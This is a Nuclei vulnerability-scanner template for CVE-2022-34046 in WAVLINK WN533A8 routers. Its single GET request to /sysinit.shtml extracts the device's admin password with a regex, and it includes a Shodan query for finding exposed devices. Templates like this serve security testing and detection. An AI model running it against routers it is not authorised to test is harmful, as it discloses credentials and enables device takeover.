nuclei-templates/http/cves/2022/CVE-2022-34046.yaml

57 lines
1.9 KiB
YAML

id: CVE-2022-34046
info:
name: WAVLINK WN533A8 - Improper Access Control
author: For3stCo1d
severity: high
description: |
WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: |
Apply the latest firmware update provided by the vendor to fix the access control issue.
reference:
- https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharing
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046
- http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-34046
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-34046
cwe-id: CWE-863
epss-score: 0.21264
epss-percentile: 0.95938
cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wavlink
product: wn533a8_firmware
shodan-query: http.title:"Wi-Fi APP Login"
tags: packetstorm,cve,cve2022,wavlink,router,exposure
http:
- raw:
- |
GET /sysinit.shtml?r=52300 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'var syspasswd="'
- '<title>APP</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
regex:
- 'syspasswd="(.+?)"'
# digest: 4a0a0047304502207f091efe96072f4682989b67f8f692b4ed808d07215666df782f85fb758663c2022100f91e2081c6b55f96c991e68ec45ff2607f70ba434175b8ac76331c9292b53135:922c64590222798bb761d5b6d8e72950